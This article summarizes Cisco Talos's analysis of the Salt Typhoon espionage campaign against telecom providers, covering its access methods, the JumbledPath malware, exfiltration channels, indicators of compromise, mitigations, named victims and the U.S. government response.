Cisco detailed Salt Typhoon Attack on Telecom Networks

The Salt Typhoon cyber espionage campaign has been meticulously analyzed by Cisco Talos, revealing a highly sophisticated operation targeting global telecommunications networks. This campaign, attributed to a suspected Beijing-linked threat actor, demonstrates advanced capabilities, including prolonged persistence in compromised systems and extensive exfiltration of sensitive data.

Overview of the Campaign

Emergence and Tactics

• Target Audience: The campaign primarily focuses on telecommunications providers. However, it has also extended to universities and other critical infrastructure, indicating a broad scope of targets.
• Phishing Techniques: Attackers employ spear-phishing emails containing malicious attachments or links. These emails are crafted to deceive recipients into executing the malicious payload, often appearing as legitimate communications from trusted sources.

Infection Chain

Initial Infection

• Compromised Credentials: The primary method of gaining initial access involves using compromised login credentials. Attackers acquire these credentials through various means, including phishing and exploiting weak password encryption methods.
• Exploited Vulnerabilities: In certain cases, attackers have leveraged known vulnerabilities, such as CVE-2018-0171, to gain access to Cisco devices. Exploiting these vulnerabilities allows them to bypass security measures and establish a foothold in the target network.

Persistence Mechanism

• Living-off-the-Land (LOTL) Techniques: Salt Typhoon extensively uses LOTL techniques, leveraging inherent functionalities and administrative tools within the compromised environments to avoid detection. This includes using tools like tcpdump and Cisco-specific commands like tpacap to monitor sensitive data and discover security keys.

Key Components

Custom Malware

• JumbledPath: Cisco Talos discovered a new custom-built malware named “JumbledPath,” which allows attackers to create a chain of remote connections between targeted Cisco devices and Salt Typhoon-controlled jump hosts. This malware facilitates encrypted packet capture and data exfiltration, significantly enhancing the attackers’ ability to steal sensitive information without being detected.

Data Exfiltration

Exfiltration Channels

• TFTP and FTP: Attackers exfiltrate network configurations over TFTP (Trivial File Transfer Protocol) or FTP (File Transfer Protocol). These files often contain authentication material and a detailed blueprint of the compromised network, providing valuable information for further exploitation.
• Encrypted Packet Capture: The JumbledPath utility enables attackers to create encrypted packet capture chains through the Guest Shell environments of compromised Cisco Nexus devices. This method ensures that the data being exfiltrated remains hidden from traditional network monitoring tools.

Indicators of Compromise (IoCs)

• Suspicious Network Traffic: Monitor for unusual network traffic involving TFTP, FTP, and encrypted packet captures. Such traffic can indicate the presence of data exfiltration activities.
• Executable Presence: Be vigilant for the presence of custom malware like JumbledPath and tools like tcpdump and tpacap on systems. These files are indicative of a compromised environment and should be investigated promptly.

Mitigation Measures

Immediate Actions

• Apply Security Updates: Ensure that all Cisco devices are updated with the latest security patches to mitigate known vulnerabilities. Regularly check for and apply updates to maintain a secure network environment.
• Restrict Management Interface Access: Limit access to the management interface of Cisco devices to trusted IP addresses. Implementing access controls can significantly reduce the attack surface and prevent unauthorized access.

Long-Term Strategies

• Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses in the IT infrastructure. This proactive approach helps in early detection and remediation of vulnerabilities.
• Enhanced Access Controls: Implement robust access control mechanisms to ensure that only authorized users can perform privileged actions. Enforce multi-factor authentication (MFA) for all administrative accounts to add an extra layer of security.
• Monitoring and Logging: Deploy comprehensive monitoring and logging solutions to detect and respond to unauthorized access attempts. Regularly review logs for signs of suspicious activity to promptly identify and mitigate potential threats.
• User Education and Awareness: Educate administrators and users about the risks associated with command injection vulnerabilities and the importance of following security best practices. Encourage them to report any suspicious activities promptly.

Known Victims of Salt Typhoon

U.S. Telecommunications Companies

1. AT&T: One of the largest telecommunications companies in the U.S., AT&T confirmed that its network was compromised by Salt Typhoon attackers.
2. Verizon: Another major U.S. telecom provider, Verizon, reported breaches that targeted high-profile government and political figures.
3. Lumen Technologies: Lumen, formerly known as CenturyLink, also confirmed that its network was infiltrated by the attackers.
4. Charter Communications: Recently added to the list of victims, Charter Communications faced breaches that compromised sensitive data.
5. Consolidated Communications: Another recent addition, Consolidated Communications, experienced similar breaches.
6. Windstream: Windstream was also targeted, adding to the growing list of compromised telecom networks.

Other Affected Entities

• T-Mobile: Although initially reported as a victim, T-Mobile later clarified that it was not among the nine companies referenced by the government. However, it acknowledged attempts consistent with Salt Typhoon’s tactics.
• Cisco and Fortinet Devices: The attackers exploited unpatched vulnerabilities in Cisco and Fortinet devices to gain access to the networks.

Impact and Risks

• Sensitive Data Access: The breaches allowed attackers to access sensitive data, including text messages, voicemails, and phone calls.
• Network Management Compromise: In some cases, attackers took over high-level network management accounts, potentially allowing them to copy traffic back to China and delete their digital tracks.

Government Response

• CISA Advisory: The Cybersecurity and Infrastructure Security Agency (CISA) has advised senior government officials to switch to end-to-end encrypted messaging apps, such as Signal, to prevent interception risks.
• Legislative Actions: U.S. Senator Ron Wyden announced a bill aimed at securing American telecom infrastructure, and FCC Chair Jessica Rosenworcel proposed new regulations to address these vulnerabilities.

Final Thoughts

The Salt Typhoon campaign highlights the critical importance of robust security measures and proactive incident response strategies. By understanding the nature of the campaign and implementing the recommended mitigation measures, organizations can better protect their systems from such sophisticated threats.